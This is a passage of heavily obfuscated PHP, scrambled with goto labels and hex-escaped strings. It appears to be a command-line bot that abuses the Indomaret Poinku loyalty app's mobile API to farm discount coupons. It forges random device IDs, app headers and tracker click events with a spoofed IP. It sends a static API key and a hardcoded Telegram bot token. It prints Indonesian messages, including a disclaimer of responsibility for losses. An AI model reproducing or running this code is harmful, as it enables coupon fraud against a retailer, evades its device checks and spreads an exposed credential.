    goto TVXlG;
    PZ1X3:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto AyXe4;
    ovyF7:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto dXYuP;
    RXXua:
    $ECuqv = curl_exec($C6npe);
    goto W9Xhi;
    M31yw:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto xwJqc;
    pU2Ki:
  }
  goto wE6Ao;
  tT8Ow:
  echo @zM6ic("\x72\x65\144", "\131\x61\150\x2e\x2e\x2e\x20\101\x79\x61\x6d\x20\116\x79\141\x20\x47\141\x20\101\x64\x61\40\x2c\40\101\x6b\x61\156\x20\104\x69\40\x43\145\153\40\x4b\145\155\x62\x61\x6c\151\x2e\56\56");
  goto j_17H;
  buUjn:
  $jTEU0 = trim(fgets(STDIN));
  goto yJoIl;
  fbjNT:
  $kCT0W = str_replace("\55", '', $cod3H);
  goto gIKVK;
  Sswct:
  $egras = "5553166883:AAH-PUR2AQcNBi-UETHM2_-coBaua9Q1ja4";
  goto UFzvu;
  Gni3W:
  $zcN5u = XoZB4(array("\x7c"), $wZnHP)[0];
  goto BGYQ7;
  q_khU:
  echo "\12";
  goto SVrQX;
  kyIGl:
  kqBxp:
  goto snP1r;
  Y6dlB:
  $zcN5u = xOZb4(array("\x7c"), $tqWr2)[0];
  goto WvdVD;
  EXHsP:
  function XTCVu($lEbop, $wDisp = null, $n0sON)
  {
    goto bpj0U;
    UCewC:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\x6e\144\157\x2e\x74\170\x74");
    goto GUb3g;
    DFlSj:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto WFd8N;
    WFd8N:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto Cmhzz;
    Ytw1u:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto HjPGA;
    cOQhT:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto nMyWl;
    jqIyQ:
    return false;
    goto Yu6AC;
    bpj0U:
    $C6npe = curl_init();
    goto vZvGe;
    Yu6AC:
    yZ8P6:
    goto TeXRk;
    cvAHs:
    print_r($AXlcQ);
    goto ZikXy;
    swYS9:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto iHYoU;
    Cmhzz:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\156\144\157\x2e\164\170\164");
    goto UCewC;
    TeXRk:
    $AXlcQ = json_decode($y7f11, true);
    goto cvAHs;
    XhZjp:
    $ruc3h[] = "\x61\165\164\150\157\162\x69\172\x61\x74\x69\x6f\x6e\72\x20\x42\145\141\x72\x65\x72\x20" . $qaj_8;
    goto xtV2d;
    xtV2d:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto b0Ahu;
    pmHNY:
    E5AKl:
    goto jqIyQ;
    VQkKM:
    goto yZ8P6;
    goto pmHNY;
    vZvGe:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto cOQhT;
    o8Dz9:
    if (!$P7lm9) {
      goto E5AKl;
    }
    goto Ytw1u;
    GUb3g:
    $ECuqv = curl_exec($C6npe);
    goto EAGNH;
    b0Ahu:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto DFlSj;
    iHYoU:
    $ruc3h[] = "\x75\163\145\162\55\141\x67\145\156\x74\x3a\x20\157\153\x68\164\x74\160\57\64\x2e\71\56\x30";
    goto xAHfn;
    HjPGA:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto VQkKM;
    EAGNH:
    $P7lm9 = curl_getinfo($C6npe);
    goto o8Dz9;
    nMyWl:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto swYS9;
    xAHfn:
    $ruc3h[] = "\143\x6f\x6e\164\145\x6e\164\x2d\x74\171\x70\x65\72\x20\141\160\160\x6c\151\x63\141\164\151\157\156\x2f\x6a\163\157\156\x3b\40\143\150\141\x72\163\x65\164\x3d\125\124\106\55\x38";
    goto XhZjp;
    ZikXy:
    return $ECuqv;
    goto aFLyy;
    aFLyy:
  }
  goto t4WY0;
  Ud9mO:
  echo @zm6ic("\x72\145\x64", "\12\176\176\176\176\x7e\176\176\176\x7e\176\176\176\176\176\x7e\176\176\176\x7e\176\x7e\x7e\x7e\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\176\x7e\x7e\x7e\x7e\x7e\x7e\x7e\x7e\176\x7e\176\176\176\176\12");
  goto KSFIU;
  YyGNN:
  QWuXy:
  goto dXN8c;
  s6kmZ:
  $jTEU0 = trim(fgets(STDIN));
  goto kMWxV;
  zMUhZ:
  $Ipl73 = @$owfHy["\144\141\164\x61"][$dQ8Tp]["\160\162\x6f\166\151\156\143\145"];
  goto C4GzD;
  U5zus:
  if (!($rVPVc == '')) {
    goto r9C2_;
  }
  goto Qm56f;
  NO6kH:
  $H1g60 = json_decode($a7K8a, true);
  goto MeZfL;
  IGAYC:
  @unlink("\143\150\x61\143\x65");
  goto zYTlH;
  Zkmak:
  $XDyMm = G8Pf2("\150\164\x74\160\163\x3a\57\x2f\145\x64\x74\x73\x61\160\x70\56\x69\x6e\x64\157\155\141\x72\x65\164\x70\x6f\x69\x6e\153\x75\x2e\x63\157\155\57\x63\157\x75\x70\157\156\x2f\141\x70\x69\x78\55\x31\x35\60\62\x2d\141\x70\x69\57\155\x6f\142\151\154\145\x2f\143\x6f\165\160\157\156\x73\x2f\x68\141\x73\55\x6e\x65\167\55\x63\157\x75\x70\157\156", $aY0el, $GOXkU, $mlMLt);
  goto Lf5WQ;
  hL1pe:
  print_r($zcN5u);
  goto wb_0Q;
  TUrUS:
  $KbHJf = rand(1000000, 9999999);
  goto YrlkR;
  C_tuY:
  echo "\x45\x72\162\157\162\40\x64\x65\154\145\x74\x69\156\147\x20{$xp_1p}\x20\x20";
  goto LLunD;
  wMsWI:
  @unlink("\160\157\x69\x6e\x68\160\x2e\x70\150\x70");
  goto cwAz7;
  FqbQV:
  function nW0aQ($lEbop, $wDisp = null)
  {
    goto dbmyU;
    UpmsT:
    return $ECuqv;
    goto fGGRb;
    dlJnh:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto zt5oL;
    vlx2Z:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\x64\157\56\x74\170\x74");
    goto VBy7S;
    RGzgu:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto cUtMy;
    qyaxt:
    goto kAqFN;
    goto tZuqX;
    b1OGS:
    $P7lm9 = curl_getinfo($C6npe);
    goto X_uSQ;
    q_Ayx:
    $ruc3h[] = "\143\x6f\156\x74\x65\x6e\x74\x2d\x74\x79\x70\145\72\40\x61\x70\160\x6c\151\143\141\164\151\x6f\x6e\57\152\163\157\156\73\40\x63\x68\141\162\163\145\x74\x3d\x55\x54\x46\x2d\x38";
    goto kMobk;
    cUtMy:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto qyaxt;
    dbmyU:
    $C6npe = curl_init();
    goto dlJnh;
    GJ7VZ:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\151\x6e\144\x6f\56\x74\170\164");
    goto vlx2Z;
    OJBN_:
    $ruc3h[] = "\165\163\145\x72\x2d\141\x67\145\156\x74\x3a\x20\157\153\150\x74\x74\x70\57\64\x2e\71\56\x30";
    goto q_Ayx;
    pUvMv:
    kAqFN:
    goto hy5rs;
    qDNH2:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto FRSps;
    tZuqX:
    FasBy:
    goto DE6cn;
    X_uSQ:
    if (!$P7lm9) {
      goto FasBy;
    }
    goto RGzgu;
    hy5rs:
    $AXlcQ = json_decode($y7f11, true);
    goto stn1q;
    VBy7S:
    $ECuqv = curl_exec($C6npe);
    goto b1OGS;
    kMobk:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto qDNH2;
    FRSps:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto kiuHv;
    stn1q:
    print_r($AXlcQ);
    goto UpmsT;
    JULtm:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto lkAf8;
    lkAf8:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto OJBN_;
    DE6cn:
    return false;
    goto pUvMv;
    kiuHv:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto GJ7VZ;
    zt5oL:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto JULtm;
    fGGRb:
  }
  goto UumYp;
  gCa6F:
  echo @ZM6ic("\171\145\154\154\157\167", "\113\157\144\x65\40\113\165\160\x6f\x6e\x6e\x79\141\40\x20\x20\x20\x3a\40");
  goto Q87m9;
  mSjwl:
  Lqjr6("\x6d\171\x74\157\x6b\145\x6e", $zn5zd, $mlMLt);
  goto YT9J8;
  O5Ks7:
  $BcbF3 = @$Ap1KM["\144\141\x74\x61"]["\x70\150\157\x6e\x65\x4e\165\x6d\142\x65\x72"];
  goto xRR6X;
  Qb11N:
  $wDisp = "\173\x22\x70\x68\157\x6e\x65\x4e\x75\x6d\x62\145\x72\42\x3a\42" . $zn5zd . "\42\x2c\42\x64\145\x76\x69\x63\x65\111\x64\x22\72\42" . $aY0el . "\x22\175";
  goto ukSNL;
  mDHN7:
  $Ap1KM = json_decode($Jk9cx, true);
  goto EIB0l;
  sUm5u:
  echo "\xa";
  goto HNP2O;
  CGTag:
  echo @ZM6IC("\x79\145\154\154\157\167", "\x20\55\x20\x53\145\x67\141\x6c\x61\40\102\145\156\164\165\x6b\40\x4b\x65\162\165\x67\151\141\156\x20\x41\156\x64\x61\40\x42\165\153\141\x6e\40\124\141\x6e\x67\x67\165\x6e\x67\x20\112\141\x77\141\142\x20\113\141\155\x69\12");
  goto gkcvz;
  fqUMI:
  echo "\xa";
  goto CGa35;
  GhSTa:
  echo @zm6ic("\x79\145\154\154\157\x77", $qaGLY);
  goto gylcc;
  nxIft:
  goto y1Iam;
  goto l7PYF;
  qBG1z:
  aX9fj:
  goto X1rFz;
  GpGXd:
  echo @ZM6iC("\147\x72\x65\145\x6e", "\x4b\157\164\141\x20\x4b\145\x20\x3a\x20");
  goto xPuMO;
  nlTa3:
  $wDisp = "\x7b\x22\x64\x61\x74\141\42\x3a\x5b\x7b\x22\141\160\x70\x6c\x69\x63\141\164\151\x6f\156\x22\x3a\x7b\x22\141\x70\160\x5f\x76\x65\162\163\151\157\156\42\x3a\x22\63\56\61\x33\x2e\60\x22\x2c\x22\144\x65\166\151\143\145\x5f\143\154\141\x73\163\42\x3a\42\x50\x68\157\x6e\145\x22\x2c\x22\x64\x65\x76\151\143\145\137\x66\141\155\151\154\x79\x22\x3a\x22" . $GOXkU . "\42\54\x22\x64\x65\166\151\x63\x65\137\151\x64\42\72\x22" . $aY0el . "\42\54\42\157\163\137\156\141\x6d\x65\42\x3a\42\x41\156\144\162\157\151\144\40\x50\x22\x2c\x22\x6f\x73\x5f\x76\145\x72\163\x69\x6f\156\42\x3a\42\101\x6e\x64\162\x6f\x69\144\40\x39\42\x7d\x2c\x22\x63\157\162\145\x22\x3a\x7b\42\145\166\145\156\164\137\x6e\x61\155\x65\42\72\42\x63\x6c\x69\x63\153\x5f\x6c\x69\156\x6b\x22\54\x22\x65\166\x65\156\x74\x5f\164\151\155\x65\163\x74\x61\x6d\160\42\x3a" . $nb9cm . "\x2c\x22\154\x69\x6e\x6b\137\x6c\141\x62\145\154\x22\72\x22\x53\x65\154\x65\163\141\151\x22\x7d\54\42\x75\x73\x65\162\42\x3a\x7b\42\163\145\x73\x73\x69\x6f\x6e\137\x69\144\42\x3a\x22" . $MXjqh . "\42\54\x22\165\163\145\162\137\x69\144\x22\x3a" . $R_bYC . "\x2c\42\x75\x73\x65\x72\137\151\x70\137\141\x64\x64\162\145\x73\163\42\72\x22\x31\x32\67\56\60\56\60\x2e\61\x22\175\x7d\135\x7d";
  goto k_cPh;
  sde23:
  echo @zM6ic("\162\145\144", $qtgR3);
  goto zYTRQ;
  i1ZXy:
  echo "\12";
  goto es2VB;
  aVRdS:
  UI83C:
  goto SleGX;
  nT7ar:
  echo "\12";
  goto aZLkI;
  ppWla:
  $yy9BI;
  goto vSSuK;
  zwaNA:
  echo "\x53\141\x6d\x70\141\151\x20\102\x61\x72\x69\163\40\x4b\x65\40\x3a\40";
  goto uKX_I;
  Jd2f7:
  $jTEU0++;
  goto J_qYQ;
  ufC5L:
  function G8pf2($lEbop, $aY0el, $GOXkU, $mlMLt)
  {
    goto b4yFa;
    nMf4M:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto J9r2E;
    WrCD3:
    return false;
    goto Vdugx;
    Vdugx:
    XHelQ:
    goto zsBt5;
    scSkM:
    $ruc3h[] = "\x75\x73\145\x72\55\141\147\145\x6e\x74\x3a\40\x6f\x6b\150\x74\164\x70\x2f\x35\x2e\60\56\60\x2d\141\x6c\x70\x68\141\56\62";
    goto UdaZl;
    DiIOE:
    if (!$P7lm9) {
      goto Uejy4;
    }
    goto u4786;
    TXsAg:
    $P7lm9 = curl_getinfo($C6npe);
    goto DiIOE;
    x5FoK:
    Uejy4:
    goto WrCD3;
    ChtY7:
    $ruc3h[] = "\x61\x70\x70\x73\x3a\x20\x7b\x22\141\160\x70\x5f\166\x65\x72\x73\x69\157\156\x22\72\x22\x33\x2e\61\x33\56\x30\x22\x2c\x22\144\x65\x76\x69\143\145\x5f\143\x6c\x61\x73\x73\x22\72\42\120\150\x6f\x6e\145\42\54\x22\144\x65\x76\151\x63\145\x5f\x66\x61\x6d\151\x6c\x79\x22\x3a\x22" . $GOXkU . "\42\54\x22\x64\145\x76\151\x63\x65\137\151\144\42\x3a\42" . $aY0el . "\x22\54\x22\157\163\x5f\x6e\x61\x6d\x65\x22\72\42\101\156\144\162\x6f\151\144\x20\x50\x22\x2c\x22\x6f\x73\137\x76\145\162\163\x69\157\156\42\x3a\x22\x41\x6e\x64\162\157\x69\144\x20\71\x22\x7d";
    goto DPrr2;
    TdcCt:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto XzBfM;
    u4786:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto cBJCN;
    o5HUi:
    $ruc3h[] = "\153\x65\171\72\40\132\127\x52\x30\x63\x7a\111\167\x4d\152\x45\x36\x4d\110\102\163\142\x57\x39\x72\142\147\75\75";
    goto ChtY7;
    MBJIF:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto TdcCt;
    nsawj:
    $ruc3h[] = "\110\x6f\x73\164\72\40\145\144\164\x73\141\160\x70\56\151\156\144\157\x6d\141\162\145\x74\160\157\151\x6e\153\165\x2e\x63\157\155";
    goto o5HUi;
    KfQdO:
    $ECuqv = curl_exec($C6npe);
    goto TXsAg;
    u20Ci:
    goto XHelQ;
    goto x5FoK;
    J9r2E:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\x64\157\56\164\x78\x74");
    goto cvLnJ;
    cBJCN:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto u20Ci;
    b4yFa:
    $C6npe = curl_init();
    goto MBJIF;
    etFar:
    return $ECuqv;
    goto XTnUt;
    cvLnJ:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\156\x64\x6f\56\164\170\164");
    goto KfQdO;
    UdaZl:
    $ruc3h[] = "\x61\165\x74\x68\157\162\151\x7a\141\x74\x69\x6f\156\72\40\102\x65\141\162\x65\162\40" . $mlMLt;
    goto nsawj;
    nhXNt:
    print_r($AXlcQ);
    goto etFar;
    zsBt5:
    $AXlcQ = json_decode($y7f11, true);
    goto nhXNt;
    VvoNr:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto nMf4M;
    XzBfM:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto scSkM;
    DPrr2:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto VvoNr;
    XTnUt:
  }
  goto dnr_q;
  wtGUU:
  if (!unlink($xp_1p)) {
    goto CVvEu;
  }
  goto fZZU1;
  QM3hr:
  $zn5zd = $U0YgX;
  goto Hwq1l;
  U0V1s:
  $efQM2 = count($QRhbE) - 1;
  goto jFIe0;
  DTm09:
  echo "\xa";
  goto FhaVw;
  VEc6T:
  $wDisp = '';
  goto GdD0b;
  VZLLC:
  die;
  goto xEaWV;
  zxj7y:
  echo "\12";
  goto TU0CC;
  mH2RK:
  echo "\12\xa";
  goto Zu6S2;
  GxIi2:
  $zcN5u = XozB4(array("\x7c"), $tqWr2)[0];
  goto KsSFo;
  x_9e2:
  echo "\xa";
  goto dRer4;
  WjCv6:
  echo "\x53\141\x6d\x70\141\x69\x20\102\141\162\151\163\x20\113\145\x20\x3a\x20";
  goto Qz1nu;
  zB761:
  $yy9BI = "\60";
  goto qNkJO;
  nbiw6:
  if (!unlink($xp_1p)) {
    goto MG_Ix;
  }
  goto GFo6V;
  Ca9kW:
  $m5BZY = GgGr_("\150\164\x74\x70\x73\72\x2f\x2f\141\x73\x69\x61\55\163\x6f\165\x74\x68\145\x61\163\164\62\x2d\x69\144\155\x2d\x63\x6f\x72\160\x2d\x70\x72\144\x2e\143\154\x6f\x75\144\146\165\x6e\x63\164\x69\x6f\x6e\163\x2e\156\145\164\x2f\x69\144\x6d\141\160\x70\163\x5f\164\x72\x61\143\153\x65\x72\x5f\147\141\164\145\167\141\171", $wDisp);
  goto NV5lO;
  cDfRg:
  $E_1ED = $oNl8L;
  goto nxHbq;
  LP87k:
  $S8W9D = trim(fgets(STDIN));
  goto UsRXR;
  nROSQ:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto YDdPQ;
  Elr14:
  R1QlS("\160\157\x69\156", $rVPVc);
  goto w6iKL;
  F5zB5:
  echo "\12";
  goto cqT9Y;
  OZ3eG:
  echo "\12";
  goto VE_Bb;
  uBgC6:
  echo "\123\x61\155\160\x61\151\40\102\141\162\x69\163\x20\113\x65\40\x3a\40";
  goto q9Tbh;
  cCVTp:
  die;
  goto xgO0j;
  pLTqx:
  echo "\123\141\155\160\141\x69\x20\102\141\x72\x69\x73\40\113\145\x20\72\x20";
  goto QtF47;
  N6E3V:
  echo "\12";
  goto ZDI74;
  RYVIS:
  echo "\12";
  goto PjzOJ;
  kMlqh:
  if (!($fUekS == '')) {
    goto dlkR6;
  }
  goto ngE2Z;
  y8Khm:
  die;
  goto GysqL;
  YZCxr:
  echo "\12";
  goto k0I3d;
  N1cO9:
  echo @zM6ic("\156\x65\166\171", "\101\153\x75\156\x20\x4b\145\x20\40\x20\40\40\40\40\40\72\40");
  goto bVfIJ;
  VlP2H:
  echo @zm6iC("\x67\162\145\145\x6e", $LgiFv);
  goto yyrGC;
  rss7A:
  echo @Zm6iC("\171\x65\x6c\x6c\x6f\x77", "\x4e\141\x6d\141\40\120\x72\x6f\x76\151\x6e\163\x69\40\x20\x20\72\x20");
  goto yPK1R;
  lZyiz:
  IDXKw:
  goto SqoPf;
  qkqcs:
  echo $BcbF3;
  goto c6kVn;
  AmZDN:
  die;
  goto GazWF;
  W1xiW:
  $v1ZMX = str_replace("\15", '', $wPFxB);
  goto s24Xx;
  BUEN3:
  oFiiw:
  goto I61fI;
  z92mg:
  echo @ZM6iC("\x6e\x65\166\x79", "\120\x72\x6f\x73\x65\163\x20\x56\x65\162\x69\x66\151\153\x61\x73\x69\40\x44\x65\x76\151\x63\x65\x20\x49\x44\x2c\40\115\x6f\x68\x6f\x6e\40\x54\165\x6e\x67\147\165\x20\x2e\56");
  goto qj7Ip;
  Vy0Lw:
  $b2ucB = @$owfHy["\144\141\164\141"][0]["\x64\151\163\x74\162\x69\143\x74"]["\x63\151\164\171\x4e\x61\155\145"];
  goto MDPdh;
  VtmJu:
  goto EDwN1;
  goto IwEkL;
  XAUCG:
  echo @zm6ic("\x79\145\x6c\154\x6f\167", "\x4b\x6f\144\x65\40\x4b\x75\x70\x6f\x6e\156\x79\141\40\40\x20\40\x3a\x20");
  goto KIXqn;
  S2q_E:
  echo "\xa";
  goto G3zOO;
  N6fB1:
  echo "\12";
  goto NaHpn;
  U8SH2:
  echo @zm6Ic("\171\145\x6c\154\157\x77", "\x50\157\151\x6e\x20\101\153\165\x6e\x20\x41\156\x64\141\40\72\40");
  goto IRVRS;
  eqV69:
  if ($pew2b == "\x44\x69\x73\153\x6f\156\x20\x52\160\x20\62\65\56\x30\60\x30\x20\113\x6c\151\x6b\x20\x49\156\x64\157\155\141\162\145\164") {
    goto ybEa9;
  }
  goto eYvyG;
  jYGp4:
  echo "\xa";
  goto XdjRG;
  azsEt:
  function fq6W0()
  {
    return sprintf("\45\60\64\x78\45\x30\64\x78\x25\x30\64\170\x25\60\x34\170", mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xfff) | 0x4000, mt_rand(0, 0x3fff) | 0x8000, mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff));
  }
  goto P5IMs;
  S8Kqs:
  echo "\xa";
  goto jd00O;
  nw32r:
  @unlink("\160\157\151\156");
  goto i5AD_;
  K_dMT:
  echo @zM6ic("\156\145\x76\x79", $Y031U);
  goto Vg1v6;
  SlPSt:
  JkuZC:
  goto BLyzs;
  rihYD:
  $wlJRC = XOzb4(array("\174"), $wZnHP)[1];
  goto jk3HC;
  uP7Pk:
  if (!unlink($xp_1p)) {
    goto DiWXR;
  }
  goto EzY9G;
  Rdfo1:
  echo "\12";
  goto PMZGw;
  RB7vh:
  $qtgR3;
  goto z1S5b;
  f9zo8:
  CqA3L:
  goto gzViQ;
  tyzFG:
  $H1g60 = json_decode($a7K8a, true);
  goto hwyFK;
  HVxni:
  $efQM2 = count($QRhbE) - 1;
  goto BrlON;
  mA2X2:
  $p4iky = @$Ap1KM["\x64\141\164\x61"]["\155\x65\x6d\142\145\162\111\144"];
  goto GHDOx;
  OUMdr:
  $rVPVc = trim(fgets(STDIN));
  goto Elr14;
  ULTAl:
  @unlink("\160\x6f\151\x6e\150\160\x2e\160\x68\160");
  goto vImzz;
  uLkd3:
  echo @Zm6Ic("\156\x65\x76\171", $ABmxY);
  goto OMsUG;
  lDBc5:
  $ZNU2M = preg_replace("\x2f\133\x5e\141\x2d\172\101\55\x5a\60\x2d\71\x5c\x20\x5d\x2f", '', $ZNU2M);
  goto Lskq2;
  i4e5N:
  echo "\12";
  goto b8f1e;
  ha1Vp:
  Jcs9o:
  goto OlQAM;
  JIw4j:
  echo @zM6iC("\x72\x65\x64", $ZXjwY);
  goto jfQhS;
  E9Kac:
  if (!($yy9BI < $DxrJr)) {
    goto r2lQG;
  }
  goto OJgKJ;
  IxSOI:
  $cod3H = Fq6W0();
  goto fbjNT;
  h2nah:
  function CZLoa($lEbop, $wDisp = null)
  {
    goto l1hYE;
    uC_Au:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto vVcLj;
    ZiXut:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto jJJuo;
    kW4Op:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\x6c\151\x6b\x2e\x74\170\x74");
    goto qdmAr;
    T_ADe:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto uC_Au;
    DGypN:
    return false;
    goto fxvpg;
    easOE:
    $ruc3h[] = "\x43\x6f\156\164\x65\x6e\x74\55\x54\x79\160\145\x3a\x20\141\160\x70\154\151\x63\141\x74\151\157\156\x2f\152\163\157\156";
    goto IY2Tx;
    ff2HW:
    if (!$P7lm9) {
      goto qEFzb;
    }
    goto T_ADe;
    QDBA3:
    $ruc3h[] = "\x43\157\x6e\156\145\x63\x74\151\x6f\x6e\72\x20\x4b\x65\145\160\55\x41\154\x69\166\145";
    goto easOE;
    OlTXb:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto dAM7n;
    WLnvH:
    qEFzb:
    goto DGypN;
    Vc65P:
    $P7lm9 = curl_getinfo($C6npe);
    goto ff2HW;
    IY2Tx:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto AOXsX;
    nTyvs:
    $AXlcQ = json_decode($y7f11, true);
    goto Z_1Et;
    jJJuo:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto iVh81;
    dAM7n:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto goNTz;
    l1hYE:
    $C6npe = curl_init();
    goto kf8j1;
    AOXsX:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto OlTXb;
    kf8j1:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto mq3kO;
    Z_1Et:
    print_r($AXlcQ);
    goto Rmbjm;
    vVcLj:
    goto WRcS3;
    goto WLnvH;
    goNTz:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\x69\x6b\x2e\164\170\x74");
    goto kW4Op;
    fxvpg:
    WRcS3:
    goto nTyvs;
    qdmAr:
    $ECuqv = curl_exec($C6npe);
    goto Vc65P;
    Rmbjm:
    return $ECuqv;
    goto eI5vj;
    iVh81:
    $ruc3h[] = "\x55\x73\x65\x72\55\x41\x67\x65\x6e\x74\x3a\x20\x6f\153\150\x74\x74\160\x2f\x35\56\x30\x2e\x30\x2d\x61\x6c\x70\150\141\56\x35";
    goto QDBA3;
    mq3kO:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto ZiXut;
    eI5vj:
  }
  goto xwhDi;
  D1f2D:
  echo "\12";
  goto AT7qk;
  yxAIq:
  $DxrJr = "\61\60\60\x30\60\60\x30\60\x30\60\60\x30\60\x30\60\60\x30\60";
  goto xwqH3;
  DmLJx:
  echo "\xa";
  goto ZH85O;
  licpJ:
  eYgid:
  goto bkHpK;
  hF6Lb:
  if ($ucJzj == "\104\x69\x73\x6b\x6f\156\40\122\160\x20\x32\65\x2e\60\x30\60\x20\x4b\154\151\153\x20\x49\156\144\157\155\141\162\x65\164") {
    goto rCf0L;
  }
  goto lY4tW;
  m5ULx:
  echo $jTEU0;
  goto Akd3I;
  eWqTD:
  function YURsE($FK_yc, $bQedf, $p5fm4)
  {
    goto sFVgN;
    sFVgN:
    $FhLCi = fopen($FK_yc, "\x61");
    goto H_IBL;
    H_IBL:
    fputs($FhLCi, "{$bQedf}\40\75\x20{$p5fm4}\12");
    goto QJmoA;
    QJmoA:
    fclose($FhLCi);
    goto BrSL1;
    BrSL1:
  }
  goto Y6mvl;
  DbkXw:
  function cwALz($lEbop, $wDisp = null, $aY0el, $GOXkU, $mlMLt)
  {
    goto JcDVM;
    dvwOv:
    $ECuqv = curl_exec($C6npe);
    goto xW36T;
    JcDVM:
    $C6npe = curl_init();
    goto Jyhj4;
    fEX1j:
    $AXlcQ = json_decode($y7f11, true);
    goto NJ3UF;
    QsC1y:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto HoLuL;
    jw6RG:
    goto mODPI;
    goto VzERk;
    Jyhj4:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto j_uB3;
    msTKs:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto i7vou;
    o0D3s:
    $ruc3h[] = "\x61\165\x74\150\x6f\162\x69\x7a\x61\164\x69\157\156\72\x20\102\x65\141\x72\x65\162\40" . $mlMLt;
    goto UAtB2;
    qYbEM:
    $ruc3h[] = "\x6b\x65\x79\72\40\132\x57\x52\x30\143\x7a\111\x77\115\x6a\105\66\115\x48\x42\x73\x62\x57\71\x72\142\147\75\75";
    goto mIPrE;
    mIPrE:
    $ruc3h[] = "\141\160\160\163\72\x20\173\42\x61\160\160\137\x76\x65\x72\163\151\x6f\156\42\x3a\x22\x33\56\x31\63\56\x30\x22\x2c\x22\144\145\x76\x69\x63\145\x5f\143\x6c\141\163\163\x22\x3a\x22\120\150\157\x6e\145\42\54\x22\x64\145\166\x69\x63\145\x5f\x66\141\155\x69\x6c\171\42\x3a\x22" . $GOXkU . "\42\54\x22\144\x65\166\x69\x63\145\137\151\144\42\x3a\x22" . $aY0el . "\42\54\x22\x6f\x73\x5f\x6e\141\x6d\145\42\x3a\42\101\x6e\144\162\x6f\151\144\x20\x50\42\x2c\x22\157\x73\137\166\x65\x72\163\x69\x6f\156\x22\72\x22\101\x6e\144\162\x6f\x69\144\x20\x39\42\175";
    goto UFFaE;
    xWF0L:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\156\x64\x6f\56\x74\x78\x74");
    goto VkCXG;
    xW36T:
    $P7lm9 = curl_getinfo($C6npe);
    goto lQCaZ;
    i7vou:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto o0D3s;
    lQCaZ:
    if (!$P7lm9) {
      goto D5Y5a;
    }
    goto QsC1y;
    dqzzv:
    return false;
    goto LiWDy;
    ptNrg:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto xWF0L;
    UAtB2:
    $ruc3h[] = "\x75\x73\145\x72\x2d\141\x67\x65\156\x74\72\x20\157\153\x68\x74\x74\160\x2f\65\x2e\60\56\x30\55\x61\154\160\150\x61\56\65";
